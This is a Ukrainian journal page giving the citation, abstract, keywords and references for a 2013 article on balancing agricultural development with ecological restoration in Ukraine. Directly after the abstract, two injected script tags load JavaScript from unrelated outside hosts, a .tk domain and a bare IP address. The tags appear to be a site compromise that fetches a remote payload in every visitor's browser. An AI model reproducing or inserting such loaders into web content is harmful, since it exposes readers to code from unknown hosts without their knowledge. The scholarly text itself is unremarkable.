ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.334
Економіка агропромислового виробництва

Еколого-економічний розвиток аграрного сектору України / Рощина Ю. В. // Економіка АПК. - 2013. - № 5 - С. 37

У статті доведено, що в цілому загострення екологічної ситуації стає перешкодою на шляху стійкого соціально-економічного розвитку країни, посилюється негативний вилив екологічного фактора на стан здоров’я населення. Тому розгляд збалансованості розвитку сільського господарства й факторів природи є актуальною проблемою. Розкрито принципи збалансованого розвитку сільського господарства в умовах обов’язкового відновлення відтворюваних природних ресурсів. Пропонується створити в земельному банку позабюджетний фонд відтворення родючості ґрунтів, який формуватиметься за рахунок коштів штрафних санкцій за нанесення збитків родючості землі, що дасть змогу направляти їх на відновлення родючості ґрунтів і раціональне використання земельних ресурсів. Кошти цього фонду можуть використовувати тільки ті, хто допустив екологічні порушення стосовно використання власної землі. Табл.: 1. Рис.: 1. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: баланс економічних і природних факторів, норматив землі в обробітку, фонд відтворення, родючість земель, виробничий капітал, екологічна ситуація

Список використаних джерел

 1. Березюк С.В. Сучасні проблеми землекористування в сільському господарстві /С.В. Березюк, Ю.Б. Березюк // Економіка АПК. – 2011. – № 5. – С. 47-53.
 2. Буркинский Б.В. Экономико-экологические основы регионального природопользования / Б.В. Буркинский, В.И. Степанов, С.К. Харичков; ИПРЭЭИ НАН Украины. – Одесса: Феникс, 2005. – 576 с.
 3. ГалушкінаТ.П. Економіка природокористування [навч. посіб.] / Т.П. Галушкіна. – Х.: Бурун Книга, 2009. – 480 с.
 4. Думнов А.Д. Финансирование природоохранных мероприятий и роль экологических фондов / А.Д. Думнов, И.М. Потравный //Экономика природопользования. – 1998. – № 6. – С. 24-40.
 5. Кокин А.В. Закон сбалансированного природопользования [Электронный ресурс] / А.В. Кокин. – Режим доступа: http://www.avkokin.ru / documents/176.
 6. Крижановский Е.Н. Автоматизация методики антропогенной нагрузки и классификации экологического состояния бассейнов малых рек Винницкой области / Е.Н. Крижановский, А.В. Васильчук // Наукові праці ВНТУ. – 2011. – № 1.
 7. Литовченко І.В. Механізм оцінки антропотехногенних навантажень [Електронний ресурс] / І.В. Литовченко. – Режим доступу: http: nbuv.gov.ua /portal Soc Gum/Nzvdpu/geograf/2008. – 16 c.
 8. Паляничко H.I. Стале землекористування як головний критерій еколого-економічної оцінки використання земель сільськогосподарського призначення / Н.І. Паляничко // Економіка АПК. – 2011. – № 2. – С. 18–22.
 9. Присяжнюк Н. Главная задача аграрной реформы – сохранение плодородных почв [Электронный ресурс] / Н. Присяжнюк. – Режим доступа: http: //news.finance.ua/ru/l Новости/0/а11/2011/02/22/228795.
 10. Рожен А. От экономики рыночной к экономике биологической, или почему Национальный университет из аграрного превращается в Национальный университет биоресурсов и природопользования Украины [Електронний ресурс] / А. Рожен. – Режим доступу: http://www.zn.ua / 3000/3300/64536/.
 11. Семенов В.Ф. Екологічний менеджмент. Екологічний ризик та управління ним [Електронний ресурс] / В.Ф. Семенов. – Режим доступу: http://pidruchniki.com.ua/ecologiya /ecologichny_rizik_upravlinnya_nim.
 12. Solow R.M. A Contribution to the Theory of Economic Growth / R.M. Solow // Quarterly Journal of Economics. – 1956. – № 70. – Р. 65-94.
Читати статтю: 13_05_06.pdf